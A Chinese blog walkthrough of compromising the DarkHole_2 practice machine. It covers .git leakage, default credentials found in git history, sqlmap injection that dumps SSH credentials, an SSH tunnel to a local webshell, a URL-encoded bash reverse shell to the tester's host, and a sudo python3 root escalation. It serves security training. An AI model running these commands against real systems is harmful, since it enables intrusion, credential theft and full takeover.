DarkHole_2靶机渗透攻略

信息收集

主机发现

nmap -sC -sV 192.168.93.0/24 -p-

目标:192.168.93.134 开放22ssh,80http
在这里插入图片描述

网站信息收集

在这里插入图片描述

并未发现太多信息
在这里插入图片描述

但是根据nmap的扫描结果可知,目录192.168.93.134:80/.git/
存在git泄露。

git泄露漏洞利用

下载git源码

python2 GitHack.py http://192.168.93.134/.git

在这里插入图片描述

在这里插入图片描述

密码逻辑流程

在logon.php中可以发现用户、密码的处理逻辑
在这里插入图片描述

将/.git下载到本地
wget -r http://192.168.93.134/.git

在这里插入图片描述

使用
git clone .git webapp

命令会将该目录创建一个webapp的源码文件,可以在其中执行所有 git 操作。
在这里插入图片描述

在webap下用git log ,发现在git日志当中存在修改记录,切换到该条记录下

git log

在这里插入图片描述

git checkout a4d9 切换到master a4的带有I added login.php file with default credentials

在这里插入图片描述

vim login.php 查看登录文件
在这里插入图片描述

账密:lush@admin.com 321

登录后台成功
在这里插入图片描述

漏洞利用sql注入

http://192.168.93.134/dashboard.php?id=1 此后台url非常的诱人

查看cookie
在这里插入图片描述
PHPSESSID:“hf076rm7rggldol19i8d5qmc3j”

sqlmap直接一把梭

sqlmap -u http://192.168.93.134/dashboard.php?id=1 --cookie=PHPSESSID=hf076rm7rggldol19i8d5qmc3j --dbs
在这里插入图片描述

sqlmap -u http://192.168.93.134/dashboard.php?id=1 --cookie=PHPSESSID=hf076rm7rggldol19i8d5qmc3j -D darkhole_2 --tables
在这里插入图片描述

sqlmap -u http://192.168.93.134/dashboard.php?id=1 --cookie=PHPSESSID=hf076rm7rggldol19i8d5qmc3j -D darkhole_2 -T ssh --dump

在这里插入图片描述

得到ssh 账户 jehad fool

webshell利用

ssh登陆之后发现为普通用户
在这里插入图片描述

sudo suid 系统内核版本 ssh免密登录等未发现利用方式

cat /etc/crontab 发现存在计划任务
在这里插入图片描述

本地还在监听一个奇怪的端口9999与losy用户计划任务的端口一样
在这里插入图片描述

dao opt下的web发现index.php是一个webshell
在这里插入图片描述

查看历史命令记录
在这里插入图片描述

尝试利用webshell
在这里插入图片描述

由于开放的127.0.0.1:9999 ,kali无法访问,只有靶机可访问,弹shell失败因此需要将端口带出内网
在这里插入图片描述

webshell利用 ssh正向代理

因为当前我们拥有ssh的账密,因此使用ssh隧道是不二选择
ssh -L 9999:127.0.0.1:9999 jehad@192.168.93.134
在这里插入图片描述

getshell

反弹shell
bash -c 'bash -i >& /dev/tcp/192.168.93.130/7777 0>&1'
进行url编码

bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.93.130%2F7777%200%3E%261%27
kali监听7777

靶机通过get方式传参执行命令
http://127.0.0.1:9999/?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.93.130%2F7777%200%3E%261%27
在这里插入图片描述

在这里插入图片描述

在losy家目录下拿到第一面flag
在这里插入图片描述

提权

查看losy的历史命令发现密码
在这里插入图片描述

sudo -l 查看,发现可用root身份执行python3
在这里插入图片描述

结合前面的历史命令 python调sh

`sudo /usr/bin/python3 -c ‘import os; os.system("/bin/sh")’

`

成功提权,夺旗通关!
在这里插入图片描述

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值